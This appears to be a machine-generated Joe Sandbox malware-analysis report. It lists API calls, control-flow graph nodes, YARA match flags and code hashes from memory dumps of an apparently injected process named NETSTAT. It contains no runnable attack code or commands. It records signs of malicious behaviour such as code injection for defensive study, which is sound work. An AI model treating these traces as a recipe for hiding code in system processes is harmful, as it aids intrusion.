                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001B.00000002.29464812490.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001B.00000002.29466106363.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001B.00000002.29466155964.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_27_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Executed Functions

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 418 7e85e0-7e8631 call 7e91e0 NtCreateFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,007E3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007E3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 007E862D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 421 7e8690-7e86d9 call 7e91e0 NtReadFile
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:~,FFFFFFFF,?,r=~,?,00000000), ref: 007E86D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:~
                                                                                                                                                      • API String ID: 2738559852-1224529143
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 424 7e868d-7e86a6 426 7e86ac-7e86d9 NtReadFile 424->426 427 7e86a7 call 7e91e0 424->427 427->426
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:~,FFFFFFFF,?,r=~,?,00000000), ref: 007E86D5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID: 1:~
                                                                                                                                                      • API String ID: 2738559852-1224529143
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 437 7e870a-7e8726 438 7e872c-7e8739 NtClose 437->438 439 7e8727 call 7e91e0 437->439 439->438
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=~,?,?,007E3D50,00000000,FFFFFFFF), ref: 007E8735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=~
                                                                                                                                                      • API String ID: 3535843008-1319691047
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 440 7e8710-7e8739 call 7e91e0 NtClose
                                                                                                                                                      APIs
                                                                                                                                                      • NtClose.NTDLL(P=~,?,?,007E3D50,00000000,FFFFFFFF), ref: 007E8735
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close
                                                                                                                                                      • String ID: P=~
                                                                                                                                                      • API String ID: 3535843008-1319691047
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007D2D11,00002000,00003000,00000004), ref: 007E87F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007D2D11,00002000,00003000,00000004), ref: 007E87F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: abf1701f76db05bdf9ad488ecd7266c548959f806a863e6d6cbf128d285aa663
                                                                                                                                                      • Instruction ID: e6283e9d4b998dafd4e5ec3044aca65e88de80f0500ee9239a21e2833f4a5488
                                                                                                                                                      • Opcode Fuzzy Hash: abf1701f76db05bdf9ad488ecd7266c548959f806a863e6d6cbf128d285aa663
                                                                                                                                                      • Instruction Fuzzy Hash: 35900235A1640C02D554B15C45547460509C7D0302F51C415A0014A54DCB658A5576A1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: d69bfd371a50ce4fe5388c19c653f798a6b97a5f844ce297f1c739a44620eaae
                                                                                                                                                      • Instruction ID: 2ea7db39a2d6ed99f698a8acbf88cdcb90a6f2392ebde1718ea66f29f05af494
                                                                                                                                                      • Opcode Fuzzy Hash: d69bfd371a50ce4fe5388c19c653f798a6b97a5f844ce297f1c739a44620eaae
                                                                                                                                                      • Instruction Fuzzy Hash: 96900229622404030509E55C0744507054AC7D5352351C425F1005950CDB3188616121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1ae6f95df41fd299087a4e831d9bb2048530c497195602ba89cde84882fbf44e
                                                                                                                                                      • Instruction ID: 4bbb7a1c03b645d3436526259878b28c84ddc697af8825a907304c1b9c6ba840
                                                                                                                                                      • Opcode Fuzzy Hash: 1ae6f95df41fd299087a4e831d9bb2048530c497195602ba89cde84882fbf44e
                                                                                                                                                      • Instruction Fuzzy Hash: 05900225622C0442D604A56C4D54B070509C7D0303F51C519A0144954CCE2588616521
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f3a6574eb9d9a130b6e8c45ff8362e0155ba3bc1335b007423056930f92a97cd
                                                                                                                                                      • Instruction ID: a0b301e39943c1ab2c65c9655f519463cc330d2356feef804cbad78720e2e665
                                                                                                                                                      • Opcode Fuzzy Hash: f3a6574eb9d9a130b6e8c45ff8362e0155ba3bc1335b007423056930f92a97cd
                                                                                                                                                      • Instruction Fuzzy Hash: 4D90022565240C02D544B15C8554707050AC7D0602F51C415A0014954DCB26896576B1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 1014f8de33a0a1211280d52c04ba88979a6c2cc1b04a80873f9be389c5f653e4
                                                                                                                                                      • Instruction ID: 533324404c73e9a3eb7a10579ca4d808affc8dade7fd72b54a0f9a41d3b6d752
                                                                                                                                                      • Opcode Fuzzy Hash: 1014f8de33a0a1211280d52c04ba88979a6c2cc1b04a80873f9be389c5f653e4
                                                                                                                                                      • Instruction Fuzzy Hash: 8790026575240842D504A15C4554B060509C7E1302F51C419E1054954DCB29CC527126
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: fe59742f97e58a89143f9f647b53a8fe44fd342504204ee5224d0b1414564b7c
                                                                                                                                                      • Instruction ID: 93ef5795349c135d936a4d0ac5fcba4d2c42d74d5faafc31565a1c4acafff16c
                                                                                                                                                      • Opcode Fuzzy Hash: fe59742f97e58a89143f9f647b53a8fe44fd342504204ee5224d0b1414564b7c
                                                                                                                                                      • Instruction Fuzzy Hash: 4C90023561240813D515A15C4644707050DC7D0242F91C816A0414958DDB668952B121
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: ff5a8675e316b2f268023e80aee722e85ab0b605c34389b779d2ceadc5ec8ccf
                                                                                                                                                      • Instruction ID: 41733d23ce4ebea7c63001599fa1fc5a6ac5abe88adafd5c0558513e24d40972
                                                                                                                                                      • Opcode Fuzzy Hash: ff5a8675e316b2f268023e80aee722e85ab0b605c34389b779d2ceadc5ec8ccf
                                                                                                                                                      • Instruction Fuzzy Hash: F190027561240802D544B15C45447460509C7D0302F51C415A5054954ECB698DD57665
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 6a8859eb4e1f59659380de6d743e430f748bb5aaf087e9ede29fd61be03d0f30
                                                                                                                                                      • Instruction ID: d689a34bb10ece9f84dbfeba0ded27556c76b391f5ff6496666a1c5ce9dcf14d
                                                                                                                                                      • Opcode Fuzzy Hash: 6a8859eb4e1f59659380de6d743e430f748bb5aaf087e9ede29fd61be03d0f30
                                                                                                                                                      • Instruction Fuzzy Hash: 2C90022D62340402D584B15C554860A0509C7D1203F91D819A0005958CCE2588696321
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30161938949.0000000003320000.00000040.00000001.sdmp, Offset: 03320000, based on PE: true
                                                                                                                                                      • Associated: 0000001C.00000002.30164043056.0000000003449000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001C.00000002.30164124287.000000000344D000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_3320000_NETSTAT.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 78b7202ddd8b2b5e28e79abde3d8eadd0b6ee41fcd1532cd7b0bda923de7c352
                                                                                                                                                      • Instruction ID: 4f05907cbc0bc0b6f76737579aef5637bc00b4ce5d940a09b9b5056db517a70b
                                                                                                                                                      • Opcode Fuzzy Hash: 78b7202ddd8b2b5e28e79abde3d8eadd0b6ee41fcd1532cd7b0bda923de7c352
                                                                                                                                                      • Instruction Fuzzy Hash: 61900235A1650802D504A15C46547061509C7D0202F61C815A0414968DCBA5895175A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 428 7e88e2-7e8906 429 7e890c-7e8921 RtlFreeHeap 428->429 430 7e8907 call 7e91e0 428->430 430->429
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007D3B93), ref: 007E891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 434 7e88f0-7e8921 call 7e91e0 RtlFreeHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007D3B93), ref: 007E891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 431 7e88b0-7e88e1 call 7e91e0 RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(65~,?,007E3CAF,007E3CAF,?,007E3536,?,?,?,?,?,00000000,00000000,?), ref: 007E88DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: 65~
                                                                                                                                                      • API String ID: 1279760036-3391872701
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 550 7d9b40-7d9b69 call 7eaf70 553 7d9b6f-7d9b7d call 7eb390 550->553 554 7d9b6b-7d9b6e 550->554 557 7d9b8d-7d9b9e call 7e9720 553->557 558 7d9b7f-7d9b8a call 7eb610 553->558 563 7d9bb7-7d9bba 557->563 564 7d9ba0-7d9bb4 LdrLoadDll 557->564 558->557 564->563
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007D9BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 565 7d9b34-7d9b3f 566 7d9b96-7d9b9e 565->566 567 7d9b41-7d9b5c 565->567 568 7d9bb7-7d9bba 566->568 569 7d9ba0-7d9bb4 LdrLoadDll 566->569 570 7d9b64-7d9b69 567->570 571 7d9b5f call 7eaf70 567->571 569->568 572 7d9b6f-7d9b7d call 7eb390 570->572 573 7d9b6b-7d9b6e 570->573 571->570 576 7d9b8d-7d9b91 call 7e9720 572->576 577 7d9b7f-7d9b8a call 7eb610 572->577 576->566 577->576
                                                                                                                                                      APIs
                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 007D9BB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,007DCFC2,007DCFC2,?,00000000,?,?), ref: 007E8A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,007D7C83,?), ref: 007DD45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_28_2_7d0000_NETSTAT.jbxd
                                                                                                                                                      Yara matches
